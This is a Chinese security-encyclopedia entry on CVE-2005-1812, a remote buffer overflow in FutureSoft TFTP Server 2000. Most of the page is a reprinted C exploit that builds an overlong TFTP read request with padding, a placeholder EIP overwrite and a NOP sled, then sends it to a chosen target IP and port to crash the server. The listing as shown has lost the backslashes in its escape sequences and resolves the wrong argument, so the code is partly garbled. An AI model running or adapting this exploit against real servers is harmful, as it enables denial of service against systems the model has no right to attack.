FutureSoft TFTP Server 2000 远程缓冲区溢出漏洞-安全小百科

FutureSoft TFTP Server 2000 远程缓冲区溢出漏洞

漏洞ID	1108836	漏洞类型	缓冲区溢出
发布时间	2005-06-02	更新时间	2005-10-20
CVE编号	CVE-2005-1812	CNNVD-ID	CNNVD-200506-015
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/1027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-015

|漏洞详情

TFTPServer2000是一款运行于Windows平台上的TFTP服务器软件，支持所有RFC1350兼容的客户端。TFTPServer2000处理畸形文件访问请求时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在TFTP服务器上执行任意指令。文件访问请求中超长的文件名或类型字段会导致服务器发生缓冲区溢出，从而执行攻击者指令的任意指令，获取服务器的控制。<**>

|漏洞EXP

/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan
* Usage:tftp_exp <targetIp> [targetPort]
*
*/

/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"x00x01"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x58x58x58x58" /* EIP */
"x90x90x90x90x90x90x90x90x90x90x90x90x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x00x00x6Ex65x74x61x73x63x69"
"x69x00";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent *pTarget;
        struct sockaddr_in sock;
        SOCKET mysocket;
        int destPORT = 69;//Default to 69

        if (argc < 2){
                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploitn");
                printf("http://www.futuresoft.com/products/lit-tftp2000.htmn");
                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)n");
                printf("Exploit coded By ATmaCAn");
                printf("Web: atmacasoft.com && spyinstructors.comn");
                printf("E-Mail: [email protected]");
                printf("Credit to kozann");
                printf("Usage:tftp_exp <targetIp> [targetPort]n");
                return;
        }
        if (argc==3)
                destPORT=atoi(argv[2]);

        printf("Requesting Winsock...n");
        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) {
                printf("No winsock suitable version found!");
                return;
        }
        mysocket = socket(AF_INET, SOCK_DGRAM	, 0);
        if(mysocket==INVALID_SOCKET){
                printf("Can't create UDP socketn");
                exit(1);
        }
        printf("Resolving Hostnames...n");
        if ((pTarget = gethostbyname(argv[2])) == NULL){
                printf("Resolve of %s failedn", argv[1]);
                exit(1);
        }
        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(destPORT);

        printf("Connecting...n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                printf("Couldn't connect to host.n");
                exit(1);
        }

        printf("Connected!...n");
        Sleep(10);

        printf("RRQ->Sending packet. Size: %dn",sizeof(expbuffer));
        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
                printf("Error sending packetn");
                closesocket(mysocket);
                exit(1);
        }
        printf("Packet sent........n");
        printf("Success.n");

        closesocket(mysocket);
        WSACleanup();
}

// milw0rm.com [2005-06-02]

|参考资料

来源:BID
名称:13821
链接:http://www.securityfocus.com/bid/13821
来源:MISC
链接:http://www.security.org.sg/vuln/tftp2000-1001.html
来源:SECTRACK
名称:1014079
链接:http://securitytracker.com/id?1014079
来源:SECUNIA
名称:15539
链接:http://secunia.com/advisories/15539

相关推荐: Novell iChain Session Inheritance Vulnerability

Novell iChain Session Inheritance Vulnerability 漏洞ID 1099761 漏洞类型 Unknown 发布时间 2003-08-07 更新时间 2003-08-07 CVE编号 N/A CNNVD-ID N/A 漏…

文章版权归作者所有，未经允许请勿转载。

THE END